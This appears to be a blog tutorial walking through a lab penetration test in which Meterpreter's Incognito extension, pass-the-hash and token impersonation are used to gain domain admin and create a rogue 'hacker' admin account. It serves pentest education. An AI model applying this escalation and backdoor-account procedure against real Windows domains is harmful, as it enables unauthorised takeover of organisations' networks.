Post-Exploitation with “Incognito”.
Incognito is a tool used to escalate privileges inside an Active Directory domain on the post exploitation phase of a PenTest.
It was born as a standalone tool, later was included in Metasploit as a module and finally it was included in Meterpreter as an extension. In this demo, we are going to use the “Incognito” extension of Meterpreter.
It is used to impersonate authentication tokens on compromised windows hosts.
Authentication tokens are like Internet Cookies, a temporal key used to access different services and files on the domain without asking for credentials all the time.
There are two kinds of tokens, “impersonation tokens” and “delegation tokens”.
- Delegation: Are used on interactive sessions, like login on a host or access via Remote Desktop.
- Impersonation: Are used on passive sessions, like connect to a shared network drive.
Those tokens, once created remains on the system until it is rebooted. The delegation token created when a user logs in the system, is converted in a impersonation token once the user logs out, but still have the same rights and properties of the delegation token.
On a compromised system with “Administrator” or “SYSTEM” privileges, it is possible to use “Incognito” to impersonate any user that has generated a token on it.
But, Why we need to impersonate a user if we already are “Administrator” of the compromised host?
The answer is to escalate privileges on the domain, and then compromise all the systems on it.
Usually network administrators used to use the same “Administrator” password for all the servers, but a different one for the “Administrator” account of the PCs and of course, they used to use a different password for de “Domain Administrator”. Then, if we compromise a server, using the hashes and the “psexec” attack with luck we can access and compromise other servers, but not the whole domain (sometimes we can, but not usually). To achieve this, we need an account within the “Domain admins” group.
Here is where “Incognito” turns interesting with it’s impersonation feature.
As a PenTester, the best targets to use “Incognito” are File Servers and Development Servers, cause usually there are lots of tokens in this kind of servers.
To understand the use of “Incognito” in an easy and clear way, I set up a network on the lab with 3 servers, one Windows 2008 R2 (the Domain Controller of the ACME.local domain), and two Windows 2003 Servers, one named SRV-PROD and another named SRV-DEV.
Here is the network diagram I’m going to use:
The local Administrator account has the same password on all servers (One of the servers are in Spanish language (the windows 2008 server) so the user “Administrator” is “Administrador”, the other two windows 2003 servers are in English.
In the domain there exists the “Administrador” user (Administrator in Spanish), and Alice and Bob. Alice works in the IT department and her user in on the “domain admins” group. Bob works on administration and his user is a normal user.
The proof assumes that the PenTester has achieved a meterpreter shell on the production server (SRV-PROD) and has escalated privileges to the user «System». How to get the shell is outside the scope of this article, only comment that can be made in many ways, such as through an SQL injection in a web application using MS-SQL Server, with social engineering, exploiting a known bug on some service, with a 0 day, etc.
Here is the start meterpreter session:
Then we load “incognito” and show the tokens on the system.
As we can see, all tokens are from the local system where we already have highest privileges. We need to look for more systems on the network.
One option to search for more systems is the use of the “net view” command, witch shows shared resources on the domain.
We can see three systems on the “net view” output, the localhost (SRV-PROD), DC1 and SRV-DEV. We can see shared resources on DC1 executing “net view \\DC1” for example.
knowing the name of the other systems we can get their IP using “nslookup” command, or “ping DC1” command.
Next step is to try access the other boxes using “Pass The Hash” attack with the credentials of the compromised system.
For the demo purposes, the attacking box is on the same LAN that the target boxes so we directly point the exploits to the boxes. In a more real scenario the PenTester is outside the target LAN, but having a Meterpreter session on a box inside the LAN, lets the PenTester use it to reach the other boxes just adding a route in Metasploit that uses the Meterpreter session as a Gateway. Once the route is added to the Metasploit Framework, the rest of the attack works as it is showed, using the same IPs as targets (It is recommended to use “bind payloads” instead of “reverse payloads” if the PenTester does not have a public IP address that targets can reach with no restrictions).
First we try to access DC1 as “Administrador” (If this works our goal is already gained)
As we can see, the credentials does not work on this box.
Now, we change the IP of the remote host to the SRV-DEV IP (192.168.65.102).
First attempt fails, but remember we told before the Windows 2003 boxes were in English, and we are using the user “Administrador”. Change the user to “Administrator” and trying again.
Bingo, we got a shell. Now let’s see what we have on this box with “Incognito”.
Now we have a token from the user “alice” on “ACME” domain
Let’s see the user properties using a Windows command shell and the “net user” command.
Bingo!!! the user in on the “Admins. del dominio” group (this is the domain admins group in Spanish).
That means that if we can impersonate the user “alice”, we will become in domain admin and we would be able to work as it in any box inside the domain “ACME.local”.
Let’s try to impersonate user “alice”.
Once we become “Alice”, we use the commands “net user” and “net group” of the “cmd.exe” to create our own admin user in the domain.
Here an example.
We just create a user “hacker” with password “g00dhack123” and put it inside the “Admins. del dominio” group.
It can be checked directly on the “Domain users console” from the DC1 Server.
Now we are domain administrators with a user we control totally, witch can be used to access via Remote Desktop to any of the systems within the domain (Remote Desktop has to be enabled o the boxes. Lots of companies have open Remote Desktops to the Internet these days).
Well, that’s all. I hope you enjoy it.
When someone writes an post he/she maintains the plan of a user in his/her mind that how a
user can be aware of it. Thus that’s why this article
is perfect. Thanks!